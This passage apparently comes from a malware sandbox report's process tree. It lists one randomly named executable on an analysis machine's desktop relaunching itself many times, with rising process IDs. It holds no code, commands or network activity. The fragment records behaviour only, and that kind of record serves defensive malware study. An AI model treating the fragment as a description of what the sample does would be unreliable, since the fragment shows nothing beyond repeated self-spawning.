      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8592
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8600
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8608
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8616
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8624
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8632
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8640
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8648
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8656
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8664
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8672
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8680
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8688
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8696
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8704
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8712
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8720
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8728
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8736
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8744
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8752
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8760
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8768
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8776
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8784
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8792
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8800
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8808
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8816
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8824
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8832
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8840
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8848
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8856
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8864
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8872
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8880
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8888
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8896
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8912
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8920
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8928
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8940
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8948
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8956
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8964
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8972
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8980
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8988
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8996
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9004
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9012
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9020
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9028
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9036
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9044
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9052
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9060
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9068
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9076
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9084
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9092
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9100
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9108
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9116
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9124
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9132
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9140
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9148
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9156
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9164
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9172
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9180
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9188
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9196
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9204
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9212
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:8356
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9220
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9232
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9240
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9252
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9260
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9268
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9276
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9284
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9292
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9300
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9308
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9316
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9324
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9332
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9340
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9348
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9356
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9364
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9372
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9380
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9388
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9396
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9404
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9412
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9420
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9428
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9436
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9444
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9452
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9460
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9468
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9476
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9484
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9492
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9500
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9508
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9516
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9524
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9532
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9540
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9548
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9556
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9564
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9572
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9580
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9588
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9596
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9604
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9612
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9620
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9628
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9636
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9644
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9652
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9660
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9668
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9676
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9684
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9692
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9700
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9708
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9716
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9724
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9732
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9740
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9748
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9756
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9764
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9772
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9780
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9788
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9796
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9804
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9812
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9820
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9828
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9836
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9844
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9852
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9860
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9868
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9876
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9884
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9892
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9900
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9912
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9920
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9928
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9944
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9952
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9960
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9968
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9976
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9984
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:9992
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10000
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10008
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10016
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10024
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10032
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10040
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10048
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10056
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10064
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10072
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10080
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10088
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10096
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10104
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10112
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10120
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10128
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10136
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10144
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10152
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10160
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10168
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10176
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10184
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10192
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10200
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
      "C:\Users\Admin\Desktop\a\vg9qcBa.exe"
      4⤵
      PID:10208
  - - C:\Users\Admin\Desktop\a\vg9qcBa.exe
